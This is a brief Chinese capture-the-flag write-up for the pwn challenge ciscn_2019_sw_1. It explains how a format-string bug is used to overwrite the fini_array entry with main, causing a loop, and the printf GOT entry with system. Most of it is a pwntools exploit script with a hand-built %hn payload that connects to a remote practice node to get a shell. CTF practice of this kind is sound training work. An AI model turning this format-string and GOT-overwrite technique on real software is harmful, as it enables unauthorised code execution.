ciscn_2019_sw_1

思路

通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址)
我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell
exp:

from pwn import *
#p=process('./ciscn_2019_sw_1')
p=remote('node3.buuoj.cn',25777)
elf=ELF('./ciscn_2019_sw_1')
main=0x08048534
fini=0x0804979C
printf=elf.got['printf']
system=0x80483D0
system_low=system&0xffff
system_height=system>>16
offset=4
#payload=fmtstr_payload(offset,{fini:main},write_size='short')
payload=p32(fini)+p32(printf)+p32(printf+2)+p32(fini+2)
payload+='%'+str(main&0xffff-0x10)+'d%4$hn'+'%'+str(system_low+0x7ad0-4)+'d'+'%5$hn'+'%'+str(0x8434)+'d%6$hn'
p.sendline(payload)
log.success('payload_length: '+str(len(payload)))
p.interactive()
print len(payload)